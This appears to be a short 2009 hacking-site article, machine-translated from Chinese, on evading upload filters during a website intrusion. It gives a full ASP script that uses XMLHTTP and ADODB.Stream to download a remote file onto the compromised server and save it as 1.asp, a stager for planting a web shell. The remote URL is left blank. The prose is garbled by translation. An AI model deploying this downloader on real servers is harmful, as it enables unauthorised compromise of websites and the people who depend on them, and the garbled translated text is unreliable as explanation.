Breakthrough class to intercept the upload limit-vulnerability warning-the black bar safety net

ID MYHACK58:62200923735
Type myhack58
Reporter 佚名
Modified 2009-07-05T00:00:00


by:Prius special In our invasion of the site,sometimes submitted to our Malaysian or other ASP file,will be first-class information surveillance system The intercept,this is because it set a limit to submit a character,since it does not allow us to submit,that we can use the download method. This is like we Upload a large EXE file,the site prohibits the uploading,but we can use an external way to download to the target file downloaded to the local server. Well,this method is,as long as the server did not disable the XML and data flow components,we can to the server to submit the following ASP script file <% Set xPost = CreateObject("Microsoft. XMLHTTP") xPost. Open "GET","",, False xPost. Send() Set sGet = CreateObject("ADODB. Stream") sGet. Mode = 3 sGet. Type = 1 sGet. Open() sGet. Write(xPost. responseBody) sGet. SaveToFile Server. MapPath("1. asp"),2 set sGet = nothing set sPOST = nothing %>